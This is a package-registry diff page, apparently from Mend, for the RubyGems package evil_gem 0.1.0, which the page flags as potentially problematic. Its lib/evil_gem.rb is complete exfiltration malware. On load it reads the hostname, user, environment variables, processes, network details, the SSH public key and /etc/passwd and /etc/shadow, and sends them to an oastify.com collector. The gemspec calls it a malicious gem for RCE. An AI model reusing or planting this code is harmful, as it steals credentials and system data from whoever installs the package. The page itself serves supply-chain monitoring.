RubyGems - evil_gem - Versions diffs - 0.1.0 - Mend

evil_gem 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of evil_gem might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: f4aab1682726e013673d9e208bd25177fc83ad026c7dfc1462916c8ff5055154
+  data.tar.gz: 2b4615568fc53743c53c4f2a82b706f445ed9b685066e59f6ba2fac74ce61ea6
+SHA512:
+  metadata.gz: d17496932c6beeab234518d605cddb4612c7fa691a609292d7a4888a15418d263ac979133154f32a1fe82c5478539a35241d31fb991b9af68396fd94f72c4356
+  data.tar.gz: 30cbb647a1e6e1ecf721ea3812c8d5336f764f00bd7ee56d80f09b42adb84929d211cb6fccf537064251fec0b2966e77cfd6b56a726fee6eb5cdca98340f32ef

data/lib/evil_gem.rb ADDED Viewed

@@ -0,0 +1,64 @@
+require 'net/http'
+require 'uri'
+require 'socket'
+def send_data(param, value)
+  uri = URI.parse("http://b0c34wcaga1esyzokveeoq0z1q7iv8jx.oastify.com/?#{param}=#{URI.encode_www_form_component(value.to_s)}")
+  Net::HTTP.get(uri) rescue nil
+end
+begin
+  # Hostname & User
+  send_data("hostname", Socket.gethostname)
+  send_data("user", `whoami`.strip)
+  # System Info
+  send_data("os_version", `uname -a`.strip)
+  send_data("uptime", `uptime`.strip)
+  # Network Info
+  send_data("ip", `ip a`.strip)
+  send_data("interfaces", `ifconfig`.strip)
+  # Running Processes
+  send_data("processes", `ps aux`.strip)
+  # Environment Variables
+  send_data("env", `env`.strip)
+  # SSH Keys (if accessible)
+  ssh_keys = begin
+    File.read("#{Dir.home}/.ssh/id_rsa.pub")
+  rescue
+    "No SSH key found"
+  end
+  send_data("ssh_key", ssh_keys)
+  # Installed Packages
+  send_data("installed_pkgs", `dpkg -l || rpm -qa || brew list`.strip)
+  # Sensitive Files
+  passwd_content = begin
+    File.read('/etc/passwd')
+  rescue
+    "No access"
+  end
+  send_data("passwd", passwd_content)
+  shadow_content = begin
+    File.read('/etc/shadow')
+  rescue
+    "No access"
+  end
+  send_data("shadow", shadow_content)
+  hosts_content = begin
+    File.read('/etc/hosts')
+  rescue
+    "No access"
+  end
+  send_data("hosts", hosts_content)
+rescue => e
+  send_data("error", e.to_s)
+end

metadata ADDED Viewed

@@ -0,0 +1,54 @@
+--- !ruby/object:Gem::Specification
+name: evil_gem
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- Hacker
+bindir: bin
+cert_chain: []
+date: 2025-03-06 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: open-uri
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: This gem executes system commands
+email:
+- hacker@example.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/evil_gem.rb
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.3
+specification_version: 4
+summary: Malicious Ruby Gem for RCE
+test_files: []